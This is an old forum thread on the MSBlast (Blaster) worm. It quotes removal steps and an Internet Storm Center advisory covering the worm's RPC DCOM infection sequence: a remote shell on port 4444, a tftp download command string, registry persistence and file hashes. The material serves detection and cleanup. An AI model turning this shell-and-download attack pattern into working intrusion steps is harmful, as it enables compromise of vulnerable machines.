I thought that you coudln't get a virus or a worm unless you executed the file? Can someone clear this up for me?
Printable View
I thought that you coudln't get a virus or a worm unless you executed the file? Can someone clear this up for me?
This worm, scans other ip addresses for the RPC exploit that came out recently. When it finds a box that it can exploit...it opens a shell on the remote host and then using that shell downloads a file to the hacked computer. It then launches that program and adds it to the registry so it starts again on reboot.
Basically the worm hacks the box and installs itself on that box.
another thing about msblast.exe taken from www.mess.be
PeacEQuote:
D'z warned me about a hole in the MSN Messenger protocol that has lately been taken advantage of. It's the first thing I hear about it, but according to him "several people have already been hit by exploiters, gaining too much access".
To find out whether you're infected, press Ctrl+Alt+Del and verify if the process 'MsBlast.exe' is running. If it is, consider following the instructions below, but since there is no official security bulletin released on this topic yet... you are on your own.
- Kill the process MsBlast.exe from the task manager you just checked.
- Next, execute regedit.exe and search for the registry key:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Windows Auto Update
If it mentions MSBLAST in the path, remove that.
- Final step: delete msblast.exe from either the windows system or and system32 folders.
-BoB
Man... thats like... amazing... i didn't think a program could hack a computer by itself! But to get a "virus"(not a worm, a virus) someone has to actually start the file right?
Worms spread on their own and dont require human intervention. That is what makes them a worm.
Grinler
I can't remove it! Someone help!
Massive increase in scanning on port 135, about one scan every 10 seconds.
Internet Storm Center have posted a Yellow Alert, text of which follows.
Scanning is done Code Red style, concentrating on the pseudo-class B subnet that the infect host is in, i.e. the 65,536 hosts in 123.123.x.x.
This will mostly likely cause RPC and svchost failures in unprotected machines.
See: ISC Handlers Diary
Slashdot
Quote:
Updated August 11th 2003 17:59 EDT
RPC DCOM WORM (MSBLASTER)
This RPC DCOM worm started spreading early afternoon EDT (evening UTC). At this point, it is spreading rapidly.
**********
NOTE: PRELIMINARY. Do not base your incidents response solely on this writeup. **********
Increase in port 135 activity: http://isc.sans.org/images/port135percent.png
In order to protect yourself, you need to :
Close port 135 (if possible 135-139, 445 and 593)
Apply Patches http://www.microsoft.com/technet/sec...n/MS03-026.asp
If you are infected:
- disconnect machine from any network
- delete msblast.exe - delete registry key staring msblast.exe - reboot.
The worm may launch a syn flood against windowsupdate.com on the 16th. It has the ability to infect Windows 2000 and XP.
The worm uses the RPC DCOM vulnerability to propagate. One it finds a vulnerable system, it will spawn a shell on port 4444 and use it to download the actual worm via tftp. The exploit itself is very close to 'dcom.c' and so far appears to use the "universal Win2k" offset only.
Infection sequence: 1. SOURCE sends packets to port 135 tcp with variation of dcom.c exploit to TARGET
2. this causes a remote shell on port 4444 at the TARGET
3. the SOURCE now sends the tftp get command to the TARGET, using the shell on port 4444,
4. the target will now connect to the tftp server at the SOURCE.
The name of the binary is msblast.exe. It is packed with UPX and will self extract. The size of the binary is about 11kByte unpacked, and 6kBytes packed:
MD5sum packed: 5ae700c1dffb00cef492844a4db6cd69 (6176 Bytes)
So far we found the following properties:
- Scans sequentially for machines with open port 135, starting at a presumably random IP address
- uses multiple TFTP servers to pull the binary
- adds a registry key to start itself after reboot
Name of registry key:
SOFTWARE\Microsoft\Windows\CurrentVersion\Run, name: 'windows auto update'
Strings of interest:
msblast.exe
I just want to say LOVE YOU SAN!!
billy gates why do you make this possible ? Stop making money and fix your software!!
windowsupdate.com
start %s
tftp -i %s GET %s
%d.%d.%d.%d
%i.%i.%i.%i
BILLY
windows auto update
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Existing RPC DCOM snort signatures will detect this worm. The worm is based on dcom.c
Ok.. this is great..
The initial info I have is about what the worm does.. How are ppl recieving it?
Thanks Grinler, the info from Symantec if useless (too early for me to check the others)Quote:
This worm, scans other ip addresses for the RPC exploit that came out recently. When it finds a box that it can exploit...it opens a shell on the remote host and then using that shell downloads a file to the hacked computer. It then launches that program and adds it to the registry so it starts again on reboot.
Basically the worm hacks the box and installs itself on that box.
Cheers
I tried to scan my computer but it didn't find anything.
Found a bit more info here
Does this help?